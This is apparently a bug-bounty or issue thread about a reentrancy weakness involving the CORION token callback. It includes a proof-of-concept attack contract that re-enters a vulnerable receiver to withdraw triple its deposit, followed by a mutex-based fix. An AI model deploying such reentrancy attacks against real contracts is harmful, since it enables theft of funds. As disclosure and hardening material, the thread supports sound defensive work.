sgitt-vassky closed 7 years ago
Please, give us an example of the code that will demonstrate a real vulnerability in use.
I've understood what you said, but the thing that you are talking about is not related to CORION token. It is a detail of implementation of receiver contract.
This contract will perform 2 recursive calls and withdraw triple the amount of deposited tokens.
```solidity
contract vulnerableContract {
    address public tokenAddress;
    mapping (address => uint256) public deposited;

    // Token callback: records the deposit made by _from.
    function receiveCorionToken(address _from, uint256 _value, bytes _data) returns (bool, uint256) {
        deposited[_from] += _value;
        return (true, 0);
    }

    function giveMyTokensBack() {
        // The external call happens before the balance is cleared, so the
        // callback can re-enter while deposited[msg.sender] is still non-zero.
        corionToken(tokenAddress).transfer(msg.sender, deposited[msg.sender]);
        deposited[msg.sender] = 0;
    }
}

contract attackContract {
    bool attackMode = false;
    uint8 times = 0;

    // Token callback: re-enters giveMyTokensBack() up to two more times.
    function receiveCorionToken(address _from, uint256 _value, bytes _data) returns (bool, uint256) {
        if (attackMode && times < 2) {
            times++;
            vulnerableContract(_from).giveMyTokensBack();
        }
        return (true, 0);
    }
}
```
@sgitt-vassky this is not a bug of CORION token anyways. This is an error in third party contract implementation.
Function receiveCorionToken will invoke the caller contract to perform recursive calls.
`function()` usually cannot do it as `send` gives it only 2k gas, which is not enough for anything but logging. Here if you give only 2k gas, it wouldn't be enough to return the tokens in case of a mistake, so all remaining gas is given to `receiveCorionToken`, making re-entry attack possible.

Suggested fix: use mutexes to solve re-entrance recursive calls issues. https://en.wikipedia.org/wiki/Mutual_exclusion https://en.wikipedia.org/wiki/Lock_(computer_science)

My reward address: 0x5Df856EAc1b376d3Bc822C2eD71BA0D8BbB74C04
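
The mutex fix suggested above, applied to the receiver contract from this thread and combined with clearing the balance before the external call. This is an added example, not code from the thread or from the CORION project. It keeps the thread's Solidity 0.4.x syntax and assumes the token's `transfer` returns a `bool`; `hardenedContract`, `noReentrancy` and `locked` are hypothetical names.

```solidity
pragma solidity ^0.4.18;

// Assumed minimal view of the token: only the call used in this thread.
// The bool return value is an assumption, not taken from the CORION source.
contract corionToken {
    function transfer(address _to, uint256 _value) public returns (bool);
}

contract hardenedContract {
    address public tokenAddress;
    mapping (address => uint256) public deposited;
    bool private locked; // mutex flag, false by default

    // Rejects any call that arrives while a guarded function is still running.
    modifier noReentrancy() {
        require(!locked);
        locked = true;
        _;
        locked = false;
    }

    function hardenedContract(address _token) public {
        tokenAddress = _token;
    }

    // Only the token contract may report a deposit.
    function receiveCorionToken(address _from, uint256 _value, bytes _data) public returns (bool, uint256) {
        require(msg.sender == tokenAddress);
        deposited[_from] += _value;
        return (true, 0);
    }

    function giveMyTokensBack() public noReentrancy {
        uint256 amount = deposited[msg.sender];
        require(amount > 0);
        // Clear the balance before the external call, so a nested call
        // would see zero even if the mutex were absent.
        deposited[msg.sender] = 0;
        // The token forwards gas to the recipient's receiveCorionToken here.
        // A nested giveMyTokensBack() fails at require(!locked).
        require(corionToken(tokenAddress).transfer(msg.sender, amount));
    }
}
```

If the transfer fails or the nested call reverts, the whole transaction reverts, which also restores `deposited` and `locked` to their previous values.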